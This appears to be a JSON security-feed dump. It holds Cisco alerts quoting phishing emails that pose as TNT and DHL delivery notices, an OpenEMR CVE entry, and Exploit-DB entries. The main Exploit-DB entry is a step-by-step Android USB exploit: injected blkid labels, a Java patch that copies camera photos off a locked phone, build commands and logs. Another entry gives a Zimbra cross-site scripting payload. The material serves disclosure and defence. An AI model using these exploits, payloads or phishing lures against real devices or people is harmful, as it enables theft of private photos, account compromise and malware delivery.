Checksum** \n---|---|--- \nTNT Consigment Details_pdf.gz / TNT Consigment Details_pdf.exe \n| 520,192 \n| 0xA1459FF62EBD3A60C7332EB19B3DE607 \n \n \n \nThe following text is a sample of the email message that is associated with this threat outbreak:\n\n> Subject: **TNT EXPRESS INTERNATIONAL COURIER DELIVERY UPDATE**\n\n> Message Body:\n\n> \n**Dear Customer: \nWe attach the consignment details issued today, and the link from which you can access the TNT Express web application where you will find detailed information \nabout your bill. \nhxxps: //express.tnt.com/tntexpress/LOGIN.ASPX . \nIf you have any questions related to the concepts of the bill, please contact your usual billing manager or number on the top left of your bill. For any \nquestions about the Web application, contact TNT Express.es. This service is legally valid electronic consignment, replacing paper clearance and is the preferred \nmethod of billing TNT, also for his involvement with environmental improvement. \nA cordial greeting, \nTNT Express \n\\-------------------------------------------------------------------- \nThis message and any attachment are confidential and may be privileged or otherwise protected from disclosure.If you are not the intended recipient, please \ntelephone or email the sender and delete this message and any attachment from your system. If you are not the intended recipient you must not copy this \nmessage or attachment or disclose the contents to any other person. Please consider the environmental impact before printing this document and its \nattachment(s). Print black and white and double-sided where possible.**\n\nCisco security appliances can help protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Cisco Web Security Appliances help secure and control web and email traffic by offering layers of malware protection. Cisco security appliances are automatically updated to help prevent both spam email and hostile web URLs from being passed to the end user.\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n1 | Initial release to report significant activity detected by Cisco Security on August 13, 2018. | \u2014 | 2018-August-13 \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products \n", "reporter": "Cisco", "published": "2018-08-13T15:20:38", "type": "ciscothreats", "title": "Threat Outbreak Alert RuleID33305: Email Messages Distributing Malicious Software on August 13, 2018", "enchantments": {"score": {"modified": "2018-08-13T17:07:57", "vector": "NONE", "value": 5.0}}, "ciscoThreat": {"messageBody": "Dear Customer:\nWe attach the consignment details issued today, and the link from which you can access the TNT Express web application where you will find detailed information\nabout your bill.\nhxxps: //express.tnt.com/tntexpress/LOGIN.ASPX .\nIf you have any questions related to the concepts of the bill, please contact your usual billing manager or number on the top left of your bill. For any\nquestions about the Web application, contact TNT Express.es. This service is legally valid electronic consignment, replacing paper clearance and is the preferred\nmethod of billing TNT, also for his involvement with environmental improvement.\nA cordial greeting,\nTNT Express\n--------------------------------------------------------------------\nThis message and any attachment are confidential and may be privileged or otherwise protected from disclosure.If you are not the intended recipient, please\ntelephone or email the sender and delete this message and any attachment from your system. If you are not the intended recipient you must not copy this\nmessage or attachment or disclose the contents to any other person. Please consider the environmental impact before printing this document and its\nattachment(s). Print black and white and double-sided where possible.", "size": 520192, "subject": "TNT EXPRESS INTERNATIONAL COURIER DELIVERY UPDATE", "files": "TNT Consigment Details_pdf.gz / TNT Consigment Details_pdf.exe", "md5": "0xA1459FF62EBD3A60C7332EB19B3DE607"}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.cisco.CiscoThreatBulletin", "modified": "2018-08-13T15:20:38", "id": "CISCO-THREAT-58674", "href": "https://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=58674", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-13T17:07:57", "_object_types": ["robots.models.cisco.CiscoThreatBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Medium\n\nAlert ID: \n\n58663\n\nFirst Published:\n\n2018 August 13 12:39 GMT\n\nVersion: \n\n1\n\n## \n\nSummary \n\n * Cisco Security has detected significant activity related to spam email messages distributing malicious software. \n \nEmail messages that are related to this threat (RuleID33528) may contain the following files: \n \n**Name** | **Size in Bytes** | **MD5 Checksum** \n---|---|--- \nOriginal shipping docs..BL.jar \n| 517,947 \n| 0x0E0E26A24BA91969200D28E42CDD1EA6 \n \n \n \nThe following text is a sample of the email message that is associated with this threat outbreak:\n\n> Message Body:\n\n> \n**Dear Customer, \nAttached is the Original Shipping documents and BL as assigned to deliver to you. \nNotification for shipment event group \"Pick Up\" for 14th July, 2018. \nAWB Number: 1343355146 \nPickup Date: 2018-08-14 14:44:09 \nService: Express \nPieces: 2 \nCust. Ref: \nDescription: COMMERCIAL INVOICE, BILL OF LADING, ETC DOC \nRegards. \nThank you for shipping with DHL Express! \nDeutsche Post DHL - The Mail &amp; Logistics Group. \n2015 \u00a9 DHL International GmbH. All rights reserved. \nTerms &amp; Conditions | Privacy Statement \n\\----- End forwarded message ----- \n\\----- End forwarded message -----**\n\n \nCisco security appliances can help protect customers during the critical period between the first exploit of a virus outbreak and the release of vendor antivirus signatures. Cisco Web Security Appliances help secure and control web and email traffic by offering layers of malware protection. Cisco security appliances are automatically updated to help prevent both spam email and hostile web URLs from being passed to the end user.\n\n## \n\nRevision History \n\n * Version | Description | Section | Date \n---|---|---|--- \n1 | Initial release to report significant activity detected by Cisco Security on August 12, 2018. | \u2014 | 2018-August-13 \nShow Less\n\n* * *\n\n## \n\nLegal Disclaimer \n\n * THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE ALERTS AT ANY TIME. \n\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products \n", "reporter": "Cisco", "published": "2018-08-13T12:39:18", "type": "ciscothreats", "title": "Threat Outbreak Alert RuleID33528: Email Messages Distributing Malicious Software on August 12, 2018", "enchantments": {"score": {"modified": "2018-08-13T17:07:57", "vector": "NONE", "value": 5.0}}, "ciscoThreat": {"messageBody": "Dear Customer,\nAttached is the Original Shipping documents and BL as assigned to deliver to you.\nNotification for shipment event group \"Pick Up\" for 14th July, 2018.\nAWB Number: 1343355146\nPickup Date: 2018-08-14 14:44:09\nService: Express\nPieces: 2\nCust. Ref:\nDescription: COMMERCIAL INVOICE, BILL OF LADING, ETC DOC\nRegards.\nThank you for shipping with DHL Express!\nDeutsche Post DHL - The Mail & Logistics Group.\n2015 \u00a9 DHL International GmbH. All rights reserved.\nTerms & Conditions | Privacy Statement\n----- End forwarded message -----\n----- End forwarded message -----", "size": 517947, "subject": null, "files": "Original shipping docs..BL.jar", "md5": "0x0E0E26A24BA91969200D28E42CDD1EA6"}, "bulletinFamily": "info", "cvelist": [], "_object_type": "robots.models.cisco.CiscoThreatBulletin", "modified": "2018-08-13T12:39:18", "id": "CISCO-THREAT-58663", "href": "https://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=58663", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2018-08-14T10:58:44", "references": ["https://www.databreaches.net/openemr-patches-serious-vulnerabilities-uncovered-by-project-insecurity/", "https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485"], "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.", "edition": 1, "reporter": "NVD", "published": "2018-08-13T14:29:00", "title": "CVE-2018-15139", "type": "cve", "enchantments": {"score": {"modified": "2018-08-14T10:58:44", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2018-15139"], "scanner": [], "modified": "2018-08-13T14:29:00", "cpe": [], "id": "CVE-2018-15139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15139", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2018-08-13T17:27:00", "osvdbidlist": [], "references": [], "description": "Android - Directory Traversal over USB via Injection in blkid Output. CVE-2018-9445. Local exploit for Android platform. Tags: Local, Traversal", "edition": 1, "reporter": "Exploit-DB", "published": "2018-08-13T00:00:00", "title": "Android - Directory Traversal over USB via Injection in blkid Output", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-08-13T17:27:00", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9445"], "modified": "2018-08-13T00:00:00", "id": "EDB-ID:45192", "href": "https://www.exploit-db.com/exploits/45192/", "sourceData": "When a USB mass storage device is inserted into an Android phone (even if the\r\nphone is locked!), vold will attempt to automatically mount partitions from the\r\ninserted device. For this purpose, vold has to identify the partitions on the\r\nconnected device and collect some information about them, which is done in\r\nreadMetadata() in system/vold/Utils.cpp. This function calls out to \"blkid\",\r\nthen attempts to parse the results:\r\n\r\n\r\n std::vector<std::string> cmd;\r\n cmd.push_back(kBlkidPath);\r\n cmd.push_back(\"-c\");\r\n cmd.push_back(\"/dev/null\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"TYPE\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"UUID\");\r\n cmd.push_back(\"-s\");\r\n cmd.push_back(\"LABEL\");\r\n cmd.push_back(path);\r\n\r\n std::vector<std::string> output;\r\n status_t res = ForkExecvp(cmd, output, untrusted ? sBlkidUntrustedContext : sBlkidContext);\r\n if (res != OK) {\r\n LOG(WARNING) << \"blkid failed to identify \" << path;\r\n return res;\r\n }\r\n\r\n char value[128];\r\n for (const auto& line : output) {\r\n // Extract values from blkid output, if defined\r\n const char* cline = line.c_str();\r\n const char* start = strstr(cline, \"TYPE=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsType = value;\r\n }\r\n\r\n start = strstr(cline, \"UUID=\");\r\n if (start != nullptr && sscanf(start + 5, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsUuid = value;\r\n }\r\n\r\n start = strstr(cline, \"LABEL=\");\r\n if (start != nullptr && sscanf(start + 6, \"\\\"%127[^\\\"]\\\"\", value) == 1) {\r\n fsLabel = value;\r\n }\r\n }\r\n\r\n\r\nNormally, the UUID string can't contain any special characters because blkid\r\ngenerates it by reformatting a binary ID as a printable UUID string. However,\r\nthe version of blkid that Android is using will print the LABEL first, without\r\nescaping the characters this code scans for, allowing an attacker to place\r\nspecial characters in the fsUuid variable.\r\n\r\n\r\nFor example, if you format a USB stick with a single partition, then place a\r\nromfs filesystem in the partition as follows (on the terminal of a Linux PC):\r\n\r\n # echo '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"' > /dev/sdc1\r\n\r\nand then connect the USB stick to a Nexus 5X and run blkid as root on the\r\ndevice, you'll see the injection:\r\n\r\n bullhead:/ # blkid -c /dev/null -s TYPE -s UUID -s LABEL /dev/block/sda1\r\n /dev/block/sda1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\"\r\n\r\n\r\nlogcat shows that the injection was successful and the device is indeed using\r\nthe injected values, but vold doesn't end up doing much with the fake UUID\r\nbecause fsck_msdos fails:\r\n\r\n05-29 20:41:26.262 391 398 V vold : /dev/block/vold/public:8,1: LABEL=\"TYPE=\"vfat\" UUID=\"../../data\"\" TYPE=\"romfs\" \r\n05-29 20:41:26.262 391 398 V vold : \r\n05-29 20:41:26.263 391 398 V vold : /system/bin/fsck_msdos\r\n05-29 20:41:26.263 391 398 V vold : -p\r\n05-29 20:41:26.263 391 398 V vold : -f\r\n05-29 20:41:26.263 391 398 V vold : /dev/block/vold/public:8,1\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {652 public:8,1 vfat}\r\n05-29 20:41:26.264 813 2039 D VoldConnector: RCV <- {653 public:8,1 ../../data}\r\n05-29 20:41:26.265 813 2039 D VoldConnector: RCV <- {654 public:8,1 TYPE=}\r\n05-29 20:41:26.281 391 398 I fsck_msdos: ** /dev/block/vold/public:8,1\r\n05-29 20:41:26.285 391 398 I fsck_msdos: Invalid sector size: 8995\r\n05-29 20:41:26.286 391 398 I fsck_msdos: fsck_msdos terminated by exit(8)\r\n05-29 20:41:26.286 391 398 E Vold : Filesystem check failed (no filesystem)\r\n05-29 20:41:26.286 391 398 E vold : public:8,1 failed filesystem check\r\n05-29 20:41:26.286 813 2039 D VoldConnector: RCV <- {651 public:8,1 6}\r\n05-29 20:41:26.287 813 2039 D VoldConnector: RCV <- {400 48 Command failed}\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,1}:\r\n05-29 20:41:26.288 2532 2532 D StorageNotification: type=PUBLIC diskId=disk:8,0 partGuid=null mountFlags=0 mountUserId=0 \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: state=UNMOUNTABLE \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n05-29 20:41:26.288 2532 2532 D StorageNotification: path=null internalPath=null \r\n\r\n\r\nFor a relatively harmless example in which vold actually ends up mounting the\r\ndevice in the wrong place, you can create a vfat partition with label\r\n'UUID=\"../##':\r\n\r\n # mkfs.vfat -n 'PLACEHOLDER' /dev/sdc1\r\n mkfs.fat 4.1 (2017-01-24)\r\n # dd if=/dev/sdc1 bs=1M count=200 | sed 's|PLACEHOLDER|UUID=\"../##|g' | dd of=/dev/sdc1 bs=1M\r\n 200+0 records in\r\n 200+0 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 1.28705 s, 163 MB/s\r\n 198+279 records in\r\n 198+279 records out\r\n 209715200 bytes (210 MB, 200 MiB) copied, 2.60181 s, 80.6 MB/s\r\n\r\nConnect it to the Android device again while running strace against vold:\r\n\r\n [pid 398] newfstatat(AT_FDCWD, \"/mnt/media_rw/../##\", 0x7d935fe708, AT_SYMLINK_NOFOLLOW) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchmodat(AT_FDCWD, \"/mnt/media_rw/../##\", 0700) = 0\r\n [pid 398] fchownat(AT_FDCWD, \"/mnt/media_rw/../##\", 0, 0, 0) = 0\r\n [pid 398] mount(\"/dev/block/vold/public:8,1\", \"/mnt/media_rw/../##\", \"vfat\", MS_NOSUID|MS_NODEV|MS_NOEXEC|MS_DIRSYNC|MS_NOATIME, \"utf8,uid=1023,gid=1023,fmask=7,d\"...) = 0\r\n [pid 398] faccessat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", F_OK) = -1 ENOENT (No such file or directory)\r\n [pid 398] mkdirat(AT_FDCWD, \"/mnt/media_rw/../##/LOST.DIR\", 0755) = 0\r\n\r\nCheck the results:\r\n\r\n bullhead:/ # ls -l /mnt\r\n total 32\r\n drwxrwx--- 3 media_rw media_rw 32768 2018-05-29 20:54 ##\r\n drwx--x--x 2 root root 40 1970-01-01 04:14 appfuse\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 asec\r\n drwxrwx--x 2 system system 40 1970-01-01 04:14 expand\r\n drwxr-x--- 2 root media_rw 40 1970-01-01 04:14 media_rw\r\n drwxr-xr-x 2 root system 40 1970-01-01 04:14 obb\r\n drwx------ 5 root root 100 1970-01-01 04:14 runtime\r\n lrwxrwxrwx 1 root root 21 1970-01-01 04:14 sdcard -> /storage/self/primary\r\n drwx------ 3 root root 60 1970-01-01 04:14 secure\r\n drwxr-xr-x 3 root root 60 1970-01-01 04:14 user\r\n bullhead:/ # mount | grep '##'\r\n /dev/block/vold/public:8,1 on /mnt/## type vfat (rw,dirsync,nosuid,nodev,noexec,noatime,uid=1023,gid=1023,fmask=0007,dmask=0007,allow_utime=0020,codepage=437,iocharset=iso8859-1,shortname=mixed,utf8,errors=remount-ro)\r\n\r\n\r\nWhen testing with a normal USB stick, the attacker has to choose between using a\r\nvfat filesystem (so that Android is capable of mounting it as external storage)\r\nand using a romfs filesystem (so that the label is long enough to specify\r\narbitrary paths). However, an attacker who wants to perform more harmful attacks\r\ncould use a malicious USB storage device that is capable of delivering different\r\ndata for multiple reads from the same location. This way, it would be possible\r\nto deliver a romfs superblock when blkfs is reading, but deliver a vfat\r\nsuperblock when the kernel is reading. I haven't tested this yet because I don't\r\nyet have the necessary hardware.\r\n\r\n\r\nWhen you fix this issue, please don't just fix the injection and/or the\r\ndirectory traversal. I believe that from a security perspective, a smartphone\r\nshould not mount storage devices that are inserted while the screen is locked\r\n(or, more generally, communication with new USB devices should be limited while\r\nthe screen is locked). Mounting a USB storage device exposes a lot of code to\r\nthe connected device, including partition table parsing, vold logic, blkid, the\r\nkernel's FAT filesystem implementation, and anything on the device that might\r\ndecide to read files from the connected storage device.\r\n\r\n\r\n############################################################\r\n\r\nThis is a PoC for stealing photos from the DCIM folder of a Pixel 2 running\r\nbuild OPM2.171026.006.C1 while the device is locked. You will need a Pixel 2 as\r\nvictim device, a corresponding AOSP build tree, a Raspberry Pi Zero W (or some\r\nother device you can use for device mode USB), a powered USB hub, and some\r\ncables.\r\n\r\nThe victim phone must be powered on, the disk encryption keys must be unlocked\r\n(meaning that you must have entered your PIN/passphrase at least once since\r\nboot), and the attack probably won't work if someone has recently (since the\r\nlast reboot) inserted a USB stick into the phone.\r\n\r\n\r\nConfigure the Raspberry Pi Zero W such that it is usable for gadget mode\r\n(see e.g. https://gist.github.com/gbaman/50b6cca61dd1c3f88f41).\r\n\r\nApply the following patch to frameworks/base in your AOSP build tree:\r\n\r\n=========================================\r\ndiff --git a/packages/ExternalStorageProvider./src/com/android/externalstorage/MountReceiver.java b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\nindex 8a6c7d68525..73be5818da1 100644\r\n--- a/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n+++ b/packages/ExternalStorageProvider/src/com/android/externalstorage/MountReceiver.java\r\n@@ -20,10 +20,38 @@ import android.content.BroadcastReceiver;\r\n import android.content.ContentProviderClient;\r\n import android.content.Context;\r\n import android.content.Intent;\r\n+import java.io.File;\r\n+import java.io.FileInputStream;\r\n+import java.io.FileOutputStream;\r\n \r\n public class MountReceiver extends BroadcastReceiver {\r\n @Override\r\n public void onReceive(Context context, Intent intent) {\r\n+ System.logE(\"MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\");\r\n+ try {\r\n+ File exfiltration_dir = new File(\"/data/exfiltrated-photos\");\r\n+ exfiltration_dir.mkdir();\r\n+ File camera_dir = new File(\"/storage/emulated/0/DCIM/Camera\");\r\n+ File[] camera_files = camera_dir.listFiles();\r\n+ for (File camera_file: camera_files) {\r\n+ System.logE(\"GRABBING '\"+camera_file.getName()+\"'\");\r\n+ File exfiltrated_file = new File(exfiltration_dir, camera_file.getName());\r\n+ exfiltrated_file.delete();\r\n+ FileInputStream ins = new FileInputStream(camera_file);\r\n+ FileOutputStream outs = new FileOutputStream(exfiltrated_file);\r\n+ byte[] buf = new byte[4096];\r\n+ int len;\r\n+ while ((len=ins.read(buf)) > 0) {\r\n+ outs.write(buf, 0, len);\r\n+ }\r\n+ ins.close();\r\n+ outs.close();\r\n+ }\r\n+ } catch (Exception e) {\r\n+ throw new RuntimeException(e);\r\n+ }\r\n+ System.logE(\"INJECTED CODE DONE\");\r\n+\r\n final ContentProviderClient client = context.getContentResolver()\r\n .acquireContentProviderClient(ExternalStorageProvider.AUTHORITY);\r\n try {\r\n=========================================\r\n\r\nThen build the tree (\"lunch aosp_walleye-userdebug\", then build with \"make\").\r\n\r\nZip the classes.dex build artifact of ExternalStorageProvider:\r\n\r\n$ zip -jX zipped_dexfile ~/aosp-walleye/out/target/common/obj/APPS/ExternalStorageProvider_intermediates/classes.dex\r\n adding: classes.dex (deflated 49%)\r\n$ mv zipped_dexfile.zip zipped_dexfile\r\n\r\nDownload the factory image for OPM2.171026.006.C1 and unpack its system partition, e.g. using commands roughly as follows:\r\n\r\n$ unzip image-walleye-opm2.171026.006.c1.zip\r\n$ ~/aosp-walleye/out/host/linux-x86/bin/simg2img system.img system.img.raw # convert sparse image to normal\r\n$ echo 'rdump / walleye-opm2.171026.006.c1/unpacked_system/' | debugfs -f- walleye-opm2.171026.006.c1/unpacked_image/system.img.raw 2>/dev/null # extract filesystem image\r\n\r\nNow build the classes.dex build artifact into an odex file and a vdex file, linking against boot.art from the factory image:\r\n\r\n$ ~/aosp-walleye/out/host/linux-x86/bin/dex2oat --runtime-arg -Xms64m --runtime-arg -Xmx512m --class-loader-context='&' --boot-image=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/framework/boot.art --dex-file=zipped_dexfile --dex-location=/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk --oat-file=package.odex --android-root=/home/user/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system --instruction-set=arm64 --instruction-set-variant=cortex-a73 --instruction-set-features=default --runtime-arg -Xnorelocate --compile-pic --no-generate-debug-info --generate-build-id --abort-on-hard-verifier-error --force-determinism --no-inline-from=core-oj.jar --compiler-filter=quicken\r\n\r\nThe resulting vdex file would not be accepted by the phone because of a CRC32\r\nchecksum mismatch; to fix it up, compile the attached vdex_crc32_fixup.c and use\r\nit to overwrite the CRC32 checksum with the expected one from the factory image:\r\n\r\n$ ./vdex_crc32_fixup package.vdex ~/google_walleye/walleye-opm2.171026.006.c1/unpacked_system/system/priv-app/ExternalStorageProvider/ExternalStorageProvider.apk \r\noriginal crc32: d0473780\r\nnew crc32: 84c10ae9\r\nvdex patched\r\n\r\nPrepare two disk images, each with a MBR partition table and a single partition.\r\nTheir partition tables should be identical.\r\nIn the first image's partition, place a fake romfs filesystem that triggers the\r\nvold bug:\r\n\r\n# echo -e '-rom1fs-########TYPE=\"vfat\" UUID=\"../../data\"\\0' > /dev/sdd1\r\n\r\nFormat the second image's partition with FAT32, and create the following\r\ndirectory structure inside that filesystem (the \"system@\" entries are files, the\r\nrest are directories):\r\n\r\n\u251c\u2500\u2500 dalvik-cache\r\n\u2502 \u2514\u2500\u2500 arm64\r\n\u2502 \u251c\u2500\u2500 system@framework@boot.art\r\n\u2502 \u251c\u2500\u2500 system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex\r\n\u2502 \u2514\u2500\u2500 system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex\r\n\u251c\u2500\u2500 LOST.DIR\r\n\u251c\u2500\u2500 misc\r\n\u2502 \u2514\u2500\u2500 profiles\r\n\u2502 \u2514\u2500\u2500 cur\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 com.android.externalstorage\r\n\u251c\u2500\u2500 user\r\n\u2502 \u2514\u2500\u2500 0\r\n\u2502 \u2514\u2500\u2500 com.android.externalstorage\r\n\u2502 \u2514\u2500\u2500 cache\r\n\u2514\u2500\u2500 user_de\r\n \u2514\u2500\u2500 0\r\n \u2514\u2500\u2500 com.android.externalstorage\r\n \u2514\u2500\u2500 code_cache\r\n\r\nThe three system@ files should have the following contents:\r\n\r\n - system@framework@boot.art should be a copy of system/framework/arm64/boot.art\r\n from the system image.\r\n - system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.dex\r\n should be the generated package.odex.\r\n - system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex\r\n should be the fixed-up package.vdex.\r\n\r\nCopy the two disk images to the Raspberry Pi Zero W; the fake romfs image should\r\nbe named \"disk_image_blkid\", the image with FAT32 should be named\r\n\"disk_image_mount\". On the Pi, build the fuse_intercept helper:\r\n\r\n$ gcc -Wall fuse_intercept.c `pkg-config fuse --cflags --libs` -o fuse_intercept\r\n\r\nThen create a directory \"mount\" and launch fuse_intercept.\r\n\r\nIn a second terminal, tell the Pi's kernel to present the contents of the mount\r\npoint as a mass storage device:\r\n\r\npi@raspberrypi:~ $ sudo modprobe dwc2\r\npi@raspberrypi:~ $ sudo modprobe g_mass_storage file=/home/pi/mount/wrapped_image stall=0\r\n\r\n\r\nTo run the attack, connect the Pi to the powered USB hub as a device. Then use\r\na USB-C OTG adapter (unless you have some fancy USB-C hub, I guess?) to connect\r\nthe powered hub to the locked phone, with the phone in USB host mode.\r\n\r\nAt this point, the phone should first mount the USB stick over\r\n/data, then immediately afterwards launch\r\ncom.android.externalstorage/.MountReceiver:\r\n\r\n06-05 21:58:20.988 656 665 I Vold : Filesystem check completed OK\r\n06-05 21:58:20.988 1115 1235 D VoldConnector: RCV <- {656 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:20.990 1115 1235 D VoldConnector: RCV <- {655 public:8,97 /mnt/media_rw/../../data}\r\n06-05 21:58:21.004 1115 1235 D VoldConnector: RCV <- {651 public:8,97 2}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:33): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.006 1115 1235 D VoldConnector: RCV <- {200 7 Command succeeded}\r\n06-05 21:58:21.004 1115 1115 W android.fg: type=1400 audit(0.0:34): avc: denied { write } for name=\"/\" dev=\"sdg1\" ino=1 scontext=u:r:system_server:s0 tcontext=u:object_r:vfat:s0 tclass=dir permissive=0\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: Notifying about public volume: VolumeInfo{public:8,97}:\r\n06-05 21:58:21.008 1335 1335 D StorageNotification: type=PUBLIC diskId=disk:8,96 partGuid=null mountFlags=0 mountUserId=0 \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: state=MOUNTED \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: fsType=vfat fsUuid=../../data fsLabel=TYPE= \r\n06-05 21:58:21.008 1335 1335 D StorageNotification: path=/mnt/media_rw/../../data internalPath=/mnt/media_rw/../../data \r\n06-05 21:58:21.020 1115 1129 I ActivityManager: Start proc 4478:com.android.externalstorage/u0a35 for broadcast com.android.externalstorage/.MountReceiver\r\n\r\nMost processes can't access the vfat filesystem that is now mounted at /data\r\neither because they lack the necessary groups or because of some SELinux rule.\r\nBut com.android.externalstorage passes both checks and can read and write (but\r\nnot execute) files from the new /data. Bytecode is loaded from\r\n/data/dalvik-cache/arm64/system@priv-app@ExternalStorageProvider@ExternalStorageProvider.apk@classes.vdex\r\nand then interpreted, allowing the attacker to steal photos from the device\r\n(since com.android.externalstorage has access to /storage/emulated/0):\r\n\r\n06-05 21:58:21.248 4478 4478 I zygote64: The ClassLoaderContext is a special shared library.\r\n06-05 21:58:21.276 4478 4478 W zygote64: JIT profile information will not be recorded: profile file does not exits.\r\n06-05 21:58:21.278 4478 4478 W asset : failed to open idmap file /data/resource-cache/vendor@overlay@Pixel@PixelThemeOverlay.apk@idmap\r\n06-05 21:58:21.326 4478 4478 D ExternalStorage: After updating volumes, found 3 active roots\r\n06-05 21:58:21.334 4478 4478 E System : MOUNTRECEIVER CODE INJECTED, GRABBING FILES...\r\n06-05 21:58:21.343 4478 4478 E System : GRABBING 'IMG_20180605_212044.jpg'\r\n06-05 21:58:21.419 4478 4478 E System : GRABBING 'IMG_20180605_215031.jpg'\r\n06-05 21:58:21.428 2218 2218 W SQLiteLog: (28) file renamed while open: /data/user/0/com.google.android.gms/databases/config.db\r\n06-05 21:58:21.465 4478 4478 E System : INJECTED CODE DONE\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45192.zip", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45192/"}, {"lastseen": "2018-08-10T13:20:54", "osvdbidlist": [], "references": [], "description": "Zimbra 8.6.0_GA_1153 - Cross-Site Scripting. CVE-2016-3411. Webapps exploit for PHP platform", "edition": 1, "reporter": "Exploit-DB", "published": "2018-08-10T00:00:00", "title": "Zimbra 8.6.0_GA_1153 - Cross-Site Scripting", "type": "exploitdb", "enchantments": {"score": {"modified": "2018-08-10T13:20:54", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3411"], "modified": "2018-08-10T00:00:00", "id": "EDB-ID:45177", "href": "https://www.exploit-db.com/exploits/45177/", "sourceData": "# Exploit Title: Xss Zimbra Mail server\r\n# Google Dork:\r\n# Date: 2018/08/10\r\n# Exploit Author: Dinbar78\r\n# Vendor Homepage: https://www.zimbra.com/\r\n\r\n# Version: 8.6.0_GA_1153 (build 20141215151110)\r\n# bug 103609 or CVE-2016-3411\r\n\r\n\r\nPayload: es.\r\nhttps:// (zimbrasite)/h/changepass?skin=\"><script>alert('hacked');</script>", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/45177/"}], "hackread": [{"lastseen": "2018-08-11T01:07:01", "_object_types": ["robots.models.base.Bulletin", "robots.models.rss.RssBulletin"], "references": [], "description": "By [Waqas](<https://www.hackread.com/author/hackread/>)\n\nHackers Demand Ransom to Unlock Hijacked Files of Upcoming PGA Golf Championship. Hackers seem to have a penchant for targeting high-profile events. After successfully attempting 